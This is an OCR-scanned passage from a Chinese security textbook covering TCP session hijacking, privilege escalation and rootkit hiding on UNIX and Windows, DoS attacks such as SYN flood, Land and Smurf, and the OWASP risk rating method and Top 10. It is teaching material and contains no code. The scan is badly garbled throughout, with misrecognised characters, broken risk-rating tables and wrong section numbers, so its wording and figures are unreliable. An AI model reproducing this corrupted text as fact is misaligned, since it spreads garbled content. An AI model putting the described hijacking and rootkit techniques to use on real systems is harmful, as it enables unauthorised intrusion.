出 一 个 带 有 净 荷 的 TCP 报 文 ， 如 果 该 主机 先 收 到 攻击 报 文 ， 就 可 以 把 合法 的 TCP 会 话 建立 
在 攻击 主机 与 被 攻击 主机 之 间 。 带 有 净 荷 的 攻击 报 文 能 够 使 被 攻击 主机 对 下 一 个 要 收 到 的 
TCP 报 文中 的 确认 序号 (ackseq) 的 值 的 要 求 发 生变 化 , 从 而 使 男 一 台 合法 的 主机 向 被 攻击 主机 
发 出 的 报 文 被 攻击 主机 拒绝 。TCP 会 话 劫持 攻击 方式 的 好 处 在 于 使 攻击 者 避 开 了 被 攻击 主机 
对 访问 者 的 身份 验证 和 安全 认证 ， 从 而 使 攻击 者 直接 进入 对 被 攻击 主机 的 的 访问 状态 ， 因 此 
对 系统 安全 构成 的 威胁 比较 严重 。 

经 常 使 用 的 会 话 劫持 工具 有 : Huggemaut、Hunt、TTY Watcher 和 T-Sight. 


7.1.2 会话 动 持 的 检测 与 防范 


由 于 会 话 劫持 在 技术 上 是 很 隐秘 的 方式 ， 因 此 难以 检测 ， 除 非 攻 击 者 造成 了 严重 的 损害 
或 故意 要 引起 人 们 对 入 侵 行为 的 注意 。 

我 们 可 以 通过 以 下 现象 来 对 是 否 发 生 会 话 劫持 进行 判定 : 

1) 客户 端 应 用 程序 的 会 话 停止 响应 或 看 起 来 被 冻结 了 ; 

2) 短 时 间 内 突 发 的 网 络 活动 ， 这 些 活动 减 慢 了 计算 机 的 运行 速度 ; 

3) 客户 端 应 用 程序 挂 起 一 段 时 间 , 原因 在 于 用 户 实际 上 在 与 攻击 者 竞争 会 话 资源 , 攻击 
者 也 在 向 服务 器 发 送 数据 

4) 网 络 变 得 很 已 ， 原 因 在 于 ， 当 被 劫持 的 客户 端 试 图 向 服务 器 发 送 更 多 不 同 的 数据 时 ， 
在 原始 客户 端 与 服务 器 间 形 成 了 ACK 洪流 。 普 通用 户 甚至 高 级 别 用 户 都 很 少 会 报告 后 两 种 
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现象 ， 因 为 这 些 问题 看 起 来 与 其 他 常见 问题 很 相像 ， 如 应 用 程序 月 省、 服务 器 忙碌 、 网 络 负 
载 很 重 等 。 

针对 上 述 的 几 种 常见 现象 ， 我 们 可 以 采用 以 下 两 种 工具 进行 会 话 劫持 检测 ; 

使 用 包 嗅 探 器 检测 会 话 劫持 


要 监视 会 话 劫持 可 以 使 用 包 嗅 探 器 ， 但 如 果 不 知道 哪些 流量 对 于 监视 会 话 劫持 有 意义 ， 
那么 监视 就 会 存在 困难 。 需 要 监视 三 种 类 型 的 数据 包 : ARP 更 新 (重复 )， 使 用 不 同 MAC 地 
址 在 客户 端 与 服务 器 之 间 传 输 的 帧 以 及 ACK 洪流 。 在 检测 会 话 劫持 的 过 程 中 ， 要 牢记 这 三 
种 类 型 。 

。 ”使 用 IDS( 入 侵 检测 系统 ) 检 测 会 话 劫持 

检测 会 话 劫持 可 以 使 用 包 嗅 探 的 方法 ， 但 这 种 方法 要 求 网 络 管理 员 实时 监视 网 络 流量 ， 
需要 耗费 大 量 的 时 间 和 精力 ， 因 此 它 并 不 适用 于 企业 的 实际 应 用 环境 。 入 侵 检测 系统 (IDS) 
都 内 置 了 一 些 能 够 检测 某 些 类 型 会 话 支持 的 识别 标志 。 利 用 这 些 系统 ， 网 络 管理 员 不 必 实 时 
监视 网 络 流量 ， 检 测 会 话 劫持 的 同时 还 节省 了 大 量 时 间 和 精力 。 

我 们 可 以 通过 限制 入 网 的 连接 或 者 对 网 络 进行 设置 ， 拒绝 假冒 本 地 地 址 从 互联 网 上 发 来 
的 数据 包 。 另 外 ， 我 们 还 可 以 采用 更 安全 的 加 密 协议 进行 有 效 防范 ， 比 如 SSH( 安 全 外 过 ， 
Secure Shell) 协 议 ，SSH 在 本 地 和 远程 主机 之 间 建 立 一 个 加 密 的 频道 ， 使 会 话 劫持 变 得 非常 
困难 。 


72 服务 器 的 动态 渗透 


前 面 的 章节 中 , 我 们 分 别 从 开发 和 应 用 的 角度 介绍 了 Web 系统 , 本 节 将 从 测试 的 角度 分 
析 如 何 利用 服务 器 的 漏洞 进行 动态 渗透 。 我 们 依旧 以 目前 主流 的 两 个 操作 系统 平台 为 基础 ， 
UNIX( 包 括 Linux) 和 Microsoft Windows。 

无 论 测试 哪个 服务 器 平台 ， 一 般 来 说 ， 经 常会 用 到 漏洞 扫 措 器。 漏洞 扫描 器 扫描 主机 ， 
并 与 漏洞 特征 数据 库 进 行 比 对 检查 。 现 在 已 知 漏洞 有 数 千 个 ， 因 此 期 待 渗透 测试 人 员 跟 踪 所 
有 漏洞 是 件 不 现实 的 任务 。 漏 洞 扫 描 器 通过 扫描 目标 主机 并 与 一 些 漏洞 特征 比较 ， 协 助 进行 
漏洞 测试 ， 可 将 漏洞 扫描 器 看 成 一 种 自动 化 的 渗透 工具 。 这 些 漏洞 数据 库 从 一 些 漏洞 网 站 上 
定期 更 新 ， 漏 洞 扫描 器 的 好 坏 取决 于 漏洞 数据 库 的 好 坏 ， 因 此 必须 定期 更 新 漏洞 数据 库 。 此 
外 ， 漏 洞 扫 描 器 的 扫描 结果 仅 反映 测试 时 系统 的 漏洞 情况 。 如 果 系 统 中 存在 某 个 漏洞 ， 而 这 
个 漏洞 又 没有 登记 在 漏洞 数据 库 中 ， 扫 描 器 就 不 会 检测 到 这 个 漏洞 的 存在 。 渗 透 测试 对 于 系 
统 安全 很 有 帮助 ， 但 也 仅 反映 进行 测试 时 系统 的 状况 及 人 们 对 各 种 风险 的 认识 程度 。 

值得 一 提 的 是 , 漏洞 扫描 器 的 攻击 性 水 平 直接 反映 了 扫描 过 程 中 对 生产 主机 造成 的 冲击 
的 程度 。 某 些 扫描 器 能 够 对 目标 发 起 拒绝 服务 攻击 ， 如 果 攻 击 成 功 ， 这 样 的 攻击 对 生产 网 络 
环境 将 造成 严重 损害 , 因此 , 只 能 在 得 到 书面 授权 时 才 可 以 对 被 测 系统 实施 这 样 的 测试 活动 。 
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7.2.1 UNIX 权限 和 根 访问 


互联 网 上 运行 的 一 些 大 型 服务 器 都 使 用 了 UNIX 系统 。 我 们 知道 UNIX 有 两 种 类 型 的 用 
户 账 户 : 普通 用 户 和 超级 用 户 。 用 户 又 被 进一步 划分 为 组 ， 在 分 配 权限 时 提供 了 额外 的 灵活 
TE. TE UNIX 架构 中 ， 所 有 东西 都 是 文件 ， 比 如 目录 、 设 备 等 ， 并 将 文件 分 配 三 种 类 型 的 权 
限 : 读 (Read)、 写 (Writej 和 执行 (Execute)。 权 限 划 分 为 三 个 部 分 进行 分 配 : 分 配给 超级 用 户 或 
root 用 户 的 权限 ， 分 配给 用 户 组 的 权限 以 及 分 配给 普通 用 户 的 权限 。 

实施 渗透 测试 ， 目 标 是 获取 root 访问 权限 ， 原 因 在 于 root 用 户 拥有 系统 的 最 高 权限 ， 几 
乎 可 以 做 它 想 做 的 一 切 事情 。 为 获取 root 访问 权限 ， 需 要 运用 权限 提升 技术 将 普通 用 户 提升 
H root 用户。 常用 的 权限 提升 技术 主要 包括 : 栈 溢出 漏洞 利用 ,mpc.statd 漏洞 利用 和 inx-login.c。 

在 得 到 系统 授权 之 后 就 要 隐藏 文件 ， 以 防 被 其 他 人 检测 到 。 实 现 这 个 任务 的 常用 方法 
是 使 用 rootkit， 其 中 在 UNIX 和 Linux 系统 中 最 常用 的 两 个 rootkit 为 Linux Rootkit IV 和 
Beastkit 7.0。 


7.2.2. Windows 安全 模型 和 漏洞 利用 


Microsoft Windows 使 用 了 两 种 安全 模型 : 域 模型 和 活动 目录 域 模 型 。NT4.0 及 以 前 的 
Windows 版 本 中 使 用 了 域 模型 。 它 由 一 个 主 域 控制 器 和 一 个 或 多 个 备份 域 控制 器 组 成 。 在 主 
域 控制 器 失效 时 ， 可 将 备份 域 控 制 器 提升 为 主 域 控 制 器 。 主 域 控制 器 在 其 安全 账户 管理 器 
(SAM, Security Accounts Manager) 数 据 库 中 存储 和 维护 了 整个 域 的 所 有 账户 。 一 个 企业 中 可 
以 有 多 个 域 , 通过 信任 关系 建立 它们 之 间 的 联系 。 活 动 目录 (AD) 模 型 在 Windows 2000 和 2003 
中 使 用 。 这 个 模型 是 一 种 分 层 结 构 ， 网 络 资源 放置 在 一 个 Jet 数据 库 中 ， 目 的 是 便于 维护 。 
在 活动 目录 模型 中 ， 可 以 建立 多 个 域 控 制 器 ， 所 有 用 户 账户 在 域 控制 器 之 间 复制 。 通 过 使 用 
森林 、 树 和 组 织 单元 来 实现 分 层 ， 组 织 单元 中 保存 对 象 ， 如 打印 机 和 用 户 账户 等 。 

无 论 采 用 哪 种 模型 ， 底 层 内 核 在 所 有 Windows 服务 器 平台 上 都 是 类 似 的 。 然 而 ， 随 着 每 
一 个 Windows 新 版 本 的 发 行 ， 微 软 都 强化 了 它 的 服务 器 的 安全 性 ， 使 得 恶意 攻击 者 对 系统 的 
攻击 更 困难 。 下 面 介绍 Windows 系统 攻击 的 两 种 技术 。 

与 Linux 类 似 , 如 果 没 有 系统 管理 员 的 访问 权限 , 那么 很 多 针对 Microsoft Windows 的 攻 
击 就 不 能 发 挥 作用 。 要 获得 管理 员 访问 权限 ， 需 要 利用 权限 提升 技术 ， 将 访问 权限 从 普通 用 
户 提升 到 具备 管理 员 权 限 的 用 户 。 权 限 提升 的 方法 主要 有 两 种 : PipeUpAdmin 和 HK。 

Windows 平台 中 最 流行 的 rootkit 是 NT Rootkit。NT Rootkit 由 两 个 文件 组 成 : deployexe 
和 ._root .sys， 需 要 把 这 两 个 文件 复制 到 目标 系统 上 ， 并 运行 deployexe， 这 样 将 安装 新 的 服 
务 root 。 与 前 面 介绍 的 Linux 下 的 rootkit 不 同 , NT Rootkit 没有 包括 很 多 的 工具 或 替换 系统 
文件 。 取 而 代 之 的 是 ，NT Rootkit 让 测试 人 员 选 择 要 隐藏 哪些 文件 ， 这 些 文件 可 以 是 木马 ， 
也 可 以 是 后 门 。 


7.2.3 ”服务 器 攻击 的 检测 与 防范 


随 着 Web 技术 的 不 断 发 展 , 检测 服务 器 攻击 是 一 项 无 休止 的 任务 。 服 务 器 或 其 他 计算 机 
可 能 受到 各 种 形式 的 攻击 ， 因 此 ， 实 现 一 种 单一 的 检测 方法 来 完成 所 有 检测 任务 是 一 个 不 切 
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合 实际 的 想法 。 比 如 ， 如 果 安 装 了 防火 墙 来 防止 外 部 的 网 络 攻击 ， 但 服务 器 对 于 内 部 网 络 攻 
击 、 病 毒 、 应 用 程序 缺陷 以 及 服务 器 窃贼 依然 敞开 大 门 。 因 此 ， 网 络 管理 员 应 该 在 所 有 可 能 
造成 影响 的 地 方 实施 检测 和 预防 方法 。 

同样 ， 对 服务 器 攻击 的 防范 工作 也 是 一 件 困难 的 事情 ， 原 因 在 于 不 仅 操作 系统 需要 安全 
保护 ， 而 且 运 行 在 操作 系统 之 上 的 应 用 程序 及 服务 器 使 用 的 网 络 也 都 需要 进行 安全 保护 。 保 
护 服 务 器 的 操作 系统 、 应 用 程序 、 网 络 安全 是 一 个 漫长 的 试验 和 排 错 的 过 程 。 


73 ”拒绝 服务 攻击 


前 面 我 多 次 提 到 了 拒绝 服务 攻击 (DoS$，Denial-of-Service)， 本 节 我 们 就 来 详细 地 分 析 一 
下 。 拒 绝 服务 攻击 是 恶意 攻击 者 通过 某 种 手段 使 系统 不 能 正常 使 用 的 一 种 攻击 ， 当 攻击 者 不 
能 够 使 用 其 他 手段 访问 数据 ， 或 者 是 仅仅 为 了 出 名 、 造 成 影响 时 ， 就 有 可 能 发 起 DoS 攻击 。 


7.3.1 Dos 攻击 的 类 型 及 原理 


DoS 攻击 可 以 划分 为 三 种 类 型 ， 带 宽 攻 击 、 协 议 攻 击 、 罗 辑 攻击 。 

带宽 攻击 是 最 古老 、 最 常见 的 Dos 攻击 。 在 这 种 攻击 中 ， 恶 意 攻击 者 使 用 数据 流量 填 满 
网 络 ,脆弱 的 系统 或 网 络 由 于 不 能 处 理发 送 给 它 的 大 量 流量 而 导致 系统 崩溃 或 响应 速度 减 慢 ， 
从 而 阻止 了 合法 用 户 的 访问 。 简 单 的 带宽 攻击 能 利用 服务 器 或 网 络 设备 吞吐 量 限制 达到 目的 
一 一 发 送 大 量 的 小 数据 包 ， 快 速 发 送 大 量 数据 包 的 攻击 通常 在 流量 达到 可 用 带宽 限制 之 前 就 
淹没 网 络 设备 。 由 于 路 由 器 、 防 火 墙 、 服 务 器 都 存在 输入 /输出 处 理 、 中 断 处 理 、CPU、 内 存 
资源 等 方面 的 约束 , 因此 读 取 包 头 进行 流量 转发 的 设备 在 处 理 大 速率 数据 包 ( 每 秒 钟 处 理 的 数 
据 包 数 ) 时 面临 压力 ， 造 成 对 数据 量 不 敏感 。 现 实 中 ,拒绝 服务 攻击 通常 通过 大 速率 数据 包 的 
实现 ， 而 不 仅 依靠 大 量 的 数据 流量 。 

协议 攻击 是 一 种 需要 更 多 技巧 的 攻击 ， 它 正在 变 得 流行 起 来 。 恶 意 攻击 者 以 目标 系统 从 
来 没有 想到 的 方式 发 送 数据 流 ， 如 攻击 者 发 送 大 量 的 SYN 数据 包 。 第 三 种 类 型 的 攻击 是 罗 
辑 攻 击 。 这 种 攻击 包含 了 对 组 网 技术 的 深入 理解 ， 因 此 也 是 一 种 最 高 技术 的 攻击 类 型 。 迪 辑 
攻击 的 一 个 典型 示例 是 LAND 攻击 ， 这 里 攻击 者 发 送 具有 相同 源 中 地址 和 目的 他 地 址 的 伪 
造 数据 包 ， 很 多 系统 不 能 处 理 这 种 引起 混乱 的 行为 ， 从 而 导致 月 溃 。 

尽管 发 自 单 台 主机 的 简单 Dos 攻击 通常 就 能 发 挥 作用 , 但 如 果 有 多 人 台 主 机 参与 攻击 效率 
就 会 更 高 ， 这 种 攻击 方式 称 为 分 布 式 拒绝 服务 DDoS，Distributed Denial of Service) 攻 击 。 很 
多 防火 墙 和 入 侵 检测 系统 在 检测 到 活动 的 DoS 攻击 后 会 阻塞 单 台 主机 , 但 是 如 果 有 上 万 台 主 
机 参与 攻击 ， 想 要 阻塞 它们 几乎 不 可 能 ， 因 为 几乎 没有 防火 墙 能 处 理 这 样 大 的 通信 流通 。 虽 
然 委托 单位 可 能 会 要 求 渗透 测试 人 员 对 某 台 主机 做 DoS 攻击 的 测试 , 但 极 少 会 要 求 进行 分 布 
式 DoS 攻击 测试 。 因 此 ， 本 节 将 重点 放 在 与 渗透 测试 相关 的 DoS 攻击 。 

下 面 我 们 举 出 一 些 常见 的 Dos 攻击 的 具体 类 型 ， 并 分 析 其 攻击 原理 。 

SYN Flood: 是 当前 最 流行 的 DoS( 拒 绝 服务 攻击 ) 与 DDoS(Distributed Denial Of Service 分 
布 式 拒绝 服务 攻击 ) 的 方式 之 一 ， 这 是 一 种 利用 TCP 协议 缺陷 ， 发 送 大 量 伪造 的 TCP 连接 请 
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求 , 使 被 攻击 方 资源 耗 尽 (CPU 满 负荷 或 内 存 不 足 ) 的 攻击 方式 .SYN Flood 攻击 的 过 程 在 TCP 
协议 中 被 称 为 三 次 握手 (Three-way Handshake)， 而 SYN Flood 拒绝 服务 就 是 通过 三 次 握手 而 
实现 的 。 攻 击 步骤 如 下 ; 

1) 攻 击 者 向 被 攻击 服务 器 发 送 一 个 包含 SYN 标志 的 TCP 报 文 , SYN(Synchronize) 即 同步 
dic. 同步 报 文 会 指明 客户 端 使 用 的 端口 以 及 TCP 连接 的 初始 序号 。 这 时 与 被 攻击 服务 器 建 
立 了 第 一 次 握手 。 

2) 受 害 服务 器 在 收 到 攻击 者 的 SYN 报 文 后 ， 将 返回 一 个 SYN+ACK 的 报 文 ， 表 示 攻 击 
者 的 请 求 被 接受 ， 同 时 TCP 序号 被 加 一 ，ACK(Acknowledgement) 即 确认 ， 这 样 就 与 被 攻击 
服务 器 建立 了 第 二 次 握手 。 

3) 攻 击 者 也 返回 一 个 确认 报 文 ACK 给 受害 服务 器 ， 同 样 TCP 序 列 号 被 加 一 ， 到 此 一 个 
TOP 连接 完成 ， 三 次 握手 完成 。 

SYN Flood 的 攻击 原理 是 ，TCP 连接 的 三 次 握手 中 , 假设 一 个 用 户 向 服务 器 发 送 了 SYN 
报 文 后 突然 死机 或 掉 线 , 那么 服务 器 在 发 出 SYN+ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 
报 文 的 (第 三 次 握手 无 法 完成 ， 这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN+ACK 给 客 
户 端 ) 并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 。 这 段 时 间 的 长 度 我 们 称 为 SYN Timeout, 一 
般 来 说 这 个 时 间 是 分 钟 的 数量 级 (大 约 为 30 15-2 分 钟 ); 一 个 用 户 出 现 异 常 导 致 服务 器 的 一 个 
线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 , 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情况 (伪造 
IP 地 址 )， 服 务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 。 即 使 是 简单 的 
保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 ， 何 况 还 要 不 断 对 这 个 列表 中 的 IP 进行 
SYN+ACK 的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ， 最 终 将 导致 堆栈 溢出 骨 江 一 一 
即使 服务 器 端的 系统 足够 强大 , 服务 器 端 也 将 忙于 处 理 攻 击 者 伪造 的 TCP 连接 请 求 而 无 暇 理 
上 客 户 的 正常 请 求 (毕竟 客户 端的 正常 请 求 比率 非常 之 小 )， 此 时 从 正常 客户 的 角度 看 来 ， 服 
务 器 失去 响应 ， 这 就 是 我 们 常见 的 SYN Flood 攻击 (SYN 洪 水 攻击 )。 

UDP 洪水 攻击 : 攻击 者 利用 简单 的 TCP/IP 服 务 ， 如 Chargen 和 Echo 来 传送 毫 无 用 处 的 
占 满 带宽 的 数据 。 通 过 伪造 与 菜 一 主机 的 Chargen 服务 之 间 的 一 次 UDP 连接 , 回复 地 址 指向 
开 着 Echo 服务 的 一 台 主 机 ， 这 样 就 生成 在 两 台 主 机 之 间 存 在 很 多 的 无 用 数据 流 ， 这 些 无 用 
数据 流 就 会 导致 带宽 的 服务 攻击 。 

Land 攻击 : 用 一 个 特别 打造 的 SYN 包 ， 它 的 原 地 址 和 目标 地 址 都 被 设置 成 某 一 个 服务 
器 地 址 。 此 举 将 导致 接受 服务 器 向 它 自 己 的 地 址 发 送 SYN-ACK 消息 ， 结 果 这 个 地 址 又 发 回 
ACK 消息 并 创建 一 个 空 连接 。 被 攻击 的 服务 器 每 接收 一 个 这 样 的 连接 都 将 保留 ， 直 到 超 
时 。 

Smurf 攻击 : 通过 使 用 将 回复 地 址 设置 成 受害 网 络 的 广播 地 址 的 ICMP 应 答 请 求 (ping) 
数据 包 来 淹没 受害 主机 的 方式 进行 。 最 终 导致 该 网 络 的 所 有 主机 都 对 此 ICMP 应 答 请 求 作出 
答复 ， 导 致 网 络 阻塞 。 它 比 ping of death 洪 水 的 流量 高 出 1 或 2 个 数量 级 。 更 加 复杂 的 Smurf 
将 源 地 址 改 为 第 三 方 的 受害 者 ， 最 终 导 致 第 三 方 衣 溃 。 

IP 欺骗 性 攻击 : 这 种 攻击 利用 RST 位 来 实现 。 假 设 有 一 个 合法 用 户 (61.61.61.61) 已 经 和 
服务 器 建立 了 正常 的 连接 ， 攻 击 者 构造 攻击 的 TCP 数据 ， 伪 装 自己 的 外 为 61.61.61.61, 并 
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向 服务 器 发 送 一 个 带 有 RST 位 的 TCP 数 据 段 。 服 务 器 接收 到 这 样 的 数据 后 , 认为 从 61.61.61.61 
发 送 的 连接 有 错误 ， 就 会 清空 缓冲 区 中 建立 好 的 连接 。 这 时 ， 如 果 合 法 用 户 61.61.61.61 再 发 
送 合法 数据 ， 服 务 器 就 已 经 没有 这 样 的 连接 了 ， 该 用 户 就 必须 重新 开始 建立 连接 。 攻 击 时 ， 
攻击 者 会 伪造 大 量 的 人 P 地 址 ， 向 目标 发 送 RST 数据 ， 使 服务 器 不 对 合法 用 户 服 务 ， 从 而 
实现 了 对 受害 服务 器 的 拒绝 服务 攻击 。 


7.3.2 DoS 攻击 的 检测 与 防范 


DoS 攻击 的 检测 通常 比较 直观 ， 但 有 时 ， 这 些 攻 击 也 难以 在 一 开始 就 被 发 现 。 发 生 DoS 
攻击 的 典型 症状 包括 : 频繁 的 网 络 攻击 、 很 高 的 CPU 利用 率 、 计 算 机 无 响应 以 及 计算 机 在 不 
确定 的 时 间 崩 溃 。Dos 攻击 旨 在 阻止 合法 用 户 访问 他 们 所 需 的 服务 , 因此 为 了 检测 这 种 攻击 ， 
可 使 用 防火 墙 和 网 络 异 常 行为 检测 器 等 多 种 设备 和 工具 。 

预防 是 阻止 Dos 攻击 的 关键 。 如 果 攻 击 截面 大 幅度 减少 ， 将 显著 降低 受 Dos 攻击 影响 
的 可 能 。 但 是 , 阻止 所 有 的 攻击 是 不 可 能 完成 的 任务 ， 人 们 能 够 做 的 就 是 加 强 系统 的 安全 性 ， 
并 希望 达到 最 好 。 为 减少 攻击 漏洞 ， 网 络 管理 员 应 该 进行 检查 的 基本 事项 如 下 : 安装 服务 包 
和 修补 包 ， 只 运行 必要 的 服务 ， 安 装 防火 墙 ， 安 装 入 侵 检测 系统 ， 安 装 反 病毒 软件 以 及 关闭 
穿越 路 由 器 和 防火 墙 的 ICMP。 通 过 安装 服务 包 ， 能 最 大 限度 地 减少 应 用 程序 和 协议 被 攻击 
的 机 会 。 

另外 ， 强 化 系统 的 安全 性 ， 即 强化 网 络 设备 的 安全 性 和 强化 应 用 程序 的 安全 性 也 可 以 有 
效 防范 Dos 攻击 。 


7.4 OWASP Top 10 


我 们 之 所 以 要 介绍 OWASP 以 及 OWASP 所 发 布 的 Top 10， 是 因为 在 实际 运用 中 往往 系 
统 都 存在 这 10 个 方面 的 安全 隐患 ， 如 果 我 们 能 够 有 针对 性 地 发 现 和 修改 这 些 隐患 ， 对 我 们 的 
应 用 系统 而 言 将 会 带 来 很 大 的 作用 。 


7.4.4 OWASP 概述 


OWASP 是 Open Web Application Security Project 的 简称 ， 是 一 个 世界 范围 的 专注 软件 
安全 的 非 须 利 性 组 织 ，OWASP 于 2004 年 4 月 21 日 在 美国 建立 ， 是 一 个 国际 组 织 ， 
OWASP 基金 会 负责 支持 世界 各 地 的 活动 。OWASP 是 一 个 开放 的 社区 ， 致 力 于 使 组 织 能 够 
构思 、 开 发 、 维 护 可 以 被 信任 的 应 用 程序 。 所 有 OWASP 的 工具 、 文 档 、 论 坛 都 是 免费 的 ， 
对 任何 有 兴趣 改进 应 用 程序 安全 的 人 员 都 是 开放 的 。 

目前 ，OWASP 已 经 被 很 多 组 织 和 政府 推荐 使 用 ， 包 括 美国 、 加 拿 大 、 英 国 、 法 国 等 国 
家 的 政府 和 组 织 。 

1) 核心 价值 

* "Open": OWASP 的 所 有 一 切 ， 从 财务 到 代码 都 是 透明 的 。 

* "Innovation: OWASP 鼓励 和 支持 针对 软件 安全 问题 解决 的 创新 。 
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* "Global: 在 世界 上 任何 一 个 角落 的 人 都 可 以 参加 OWASP 社区 。 
* "Integrity: OWASP 是 一 个 可 靠 的 、 诚 实 的 、 与 厂商 无 关 的 全 球 社 
2) 核心 目标 

。 成 为 一 个 驱动 世界 软件 的 安全 发 展 的 兴旺 的 全 球 社 


7.4.2 OWASP 风险 评估 方法 


p 


p 


OWASP 提供 了 一 个 基础 的 框架 ， 以 便 使 用 者 可 以 按 需 定制 。OWASP 所 选取 的 10 大 
风险 漏洞 是 根据 OWASP 的 风险 评估 方法 评选 的 。 本 章 将 简单 介绍 一 下 OWASP 风险 评估 
用 到 的 方法 ， 具 体 的 信息 可 以 参考 : 

http://www.owasp.org.cn/owaspproject/download/OWASPRiskRatingMethodology 
V2.pdf 

让 我 们 从 标准 的 模型 开始 : 风险 = 可 能 性 * 影 响 Risk=Likelihood*Impacb， 从 下 面 几 步 讨 
论 如 何 决定 风险 的 严重 程度 。 

D 识别 风险 : 第 一 步 是 确定 评级 对 象 的 安全 风险 。 需 要 收集 的 信息 包括 攻击 者 、 攻 击 方 
法 和 漏洞 。 

也 许 存在 多 组 攻击 者 ， 也 或 许 对 业务 有 多 种 影响 ， 总 的 来 说 ， 为 了 保险 起 见 ， 最 好 的 是 
使 用 最 坏 的 情况 ， 这 样 得 到 的 整体 最 高 。 


2) 评估 可 能 性 的 因素 : 很 多 因素 都 可 以 帮助 我 们 列 出 风险 的 可 能 性 , 例如 ， 内 部 人 员 可 
能 比 外 部 的 匿名 者 更 容易 成 为 攻击 者 ， 表 7-1 列 出 了 攻击 者 和 漏洞 因素 可 能 性 级 别 : 
表 7-1 漏洞 因素 可 能 性 级 别 
素 分 项 可 能 性 级 别 
不 具备 能 力 1 
具备 初级 能 力 3 
技术 水 平 高 级 计算 机 使 用 者 4 
具备 网 络 和 编程 能 力 6 
具备 渗透 能 力 9 
低 或 者 零 回 报 1 
动机 可 能 带 来 回报 4 
攻击 者 很 高 的 回报 9 
完全 访问 权限 或 高 昂 的 成 本 0 
. 特定 访问 权限 或 较 高 的 成 本 4 
权限 和 成 本 
部 分 访问 权限 或 一 般 的 成 本 7 
无 需 访 问 权限 或 者 没有 成 本 9 
开发 者 $ 
人 员 构 成 系统 管理 员 2 
内 部 用 户 4 
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( 续 表 ) 
素 分 项 可 能 性 级 别 

合伙 人 5 
攻击 者 人 员 构 成 认证 用 户 6 
匿名 互联 网 用 户 9 
几乎 不 可 能 1 
困难 3 

发 现 难 易 程度 - 
容易 7 
可 以 使 用 自动 化 工具 9 
几乎 不 可 能 1 
困难 3 

利用 难 易 程 度 
容易 7 
[以 使 用 自动 化 工具 9 

din = 
未 知 的 1 
隐藏 的 4 

知名 度 
明显 的 6 
众所周知 的 9 
应 用 程序 主动 发 现 1 
志 记 录 和 审核 
入 侵 检 测 日 志 记 录 和 审核 3 
日 志 记录 8 
没有 日 志 9 
3) 评估 影响 的 因素 当 考 虑 成 功 的 攻击 的 影响 时 , 关键 要 意识 到 有 两 类 影响 。 第 一 类 是 对 
应 用 程序 所 使 用 的 数据 以 及 它 所 提供 的 功能 的 “技术 影响 ”， 第 二 类 是 对 该 项 业务 和 使 用 这 个 


应 用 的 “业务 影响 ”技术 影响 可 能 性 级 别 如 表 7-2 所 示 : 


表 7-2_ 技术 影响 的 可 能 性 级 别 

Hox 分 项 可 能 性 级 别 
少量 不 敏感 信息 被 泄露 2 
少量 关键 数据 被 泄露 6 
大 量 不 敏感 信息 被 泄露 6 
7 

9 


保密 性 
大 量 敏感 信息 被 泄露 
技术 影响 所 有 数据 丢失 
少量 轻微 破坏 的 数据 
少量 严重 破坏 的 数据 


大 量 严 重 破坏 的 数据 
所 有 数据 被 完全 彻底 破坏 


3 
大 量 轻微 破坏 的 数据 5 
1 
9 


(BER) 
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素 分 项 


可 能 性 级 别 


可 用 性 


全 部 服务 中 断 9 
完全 可 追溯 1 


可 追溯 性 可 能 可 追溯 


t. 
[2 


业务 影响 可 外 


性 级 别 如 表 7-3 Bron: 


表 7-3_ 业 务 影 响 可 能 性 级 别 


少 于 修复 漏洞 
对 于 年 收 
对 年 收益 影响 显著 


损失 发 展 前 景 


财务 损失 


声誉 损失 


业务 影响 


失去 品牌 


可 能 性 级 别 


很 小 的 违规 


违规 明显 的 违规 


严重 的 违规 


侵犯 隐私 


4) 确定 风险 的 严重 程度 我 们 将 可 能 性 评估 和 影响 评估 放 在 一 起 , 计算 风险 的 总 体 严 重 程 


度 。 如 表 7-4 所 示 ， 我 们 可 以 分 为 三 个 级 别 : 
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表 7-4_ 可 能 性 与 影响 程度 


可 能 性 和 影响 程度 
0to<3 低 
3to<6 中 
6to9 高 


为 综合 考虑 风险 严重 度 ， 从 可 能 性 和 影响 角度 出 发 可 以 得 出 表 7-5: 


表 7-5_ 风 险 严重 度 与 可 能 性 
整体 风险 严重 程度 


影响 


例如 : 
攻击 者 因素 


技术 水 平 发 现 难 易 程度 利用 难 易 程度 。 | 知晓 度 | 入 侵 检测 
7 
整体 的 可 能 性 =4.375( 中 ) 


业务 影响 
i 侵犯 隐私 


整体 影响 =4.75( 中 ) 


该 风险 的 整体 严重 度 可 定义 为 “中 ”， 通 过 以 上 方法 可 以 在 日 常 中 对 所 发 现 的 风险 进行 
评级 ， 并 可 以 根据 不 同 的 等 级 制定 相应 的 改进 和 修复 计划 。 


7.4.3 OWASP Top 10 概述 


OWASP Top 10 提供 了 关于 Web 应 用 安全 的 有 力 的 文档 。 它 代表 了 一 个 关于 网 络 应 用 程 
序 最 关键 的 问题 的 共识 ， Ra 目 
前 ， 已 经 有 2004 版 、2007 版 、2010 版 和 2013 hte OWASP Top 10 重点 在 于 为 广大 企业 组 织 
确定 一 组 最 严重 的 风险 ， 而 不 仅仅 是 常见 漏洞 。 图 7-1 列 出 了 最 新 版 本 和 2010 iyi 
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OWASPTop10-2013 《新 版 ) 


村 3 
A6 一 安全 配置 错误 A5 一 安全 配置 错误 
A? 一 不 安全 的 加 密 存储 一 与 A9 合 并 成 为 字 A6 一 敏感 信息 泄漏 
AS 一 跨 站 请 求 伪造 〈CSRF) A8 一 跨 站 请 求 伪造 (CSRF) 
< 合并 在 A6 一 安全 配置 错误 > A9 一 使 用 含有 已 知 漏洞 的 组 件 


A10 一 未 验证 的 重 定向 和 转发 A10 一 未 验证 的 重 定向 和 转发 


A8 一 没有 限制 URL 访 问 一 扩展 成 为 了 A7 一 功能 级 访问 控制 缺失 


图 7-1 OWASPTOP 10 旧版 与 新 版 的 比较 


。 Al- 注入: 注入 攻击 漏洞 , 例如 SQL. OS 以 及 LDAP 注入 。 这 些 攻 击发 生 在 不 可 信 
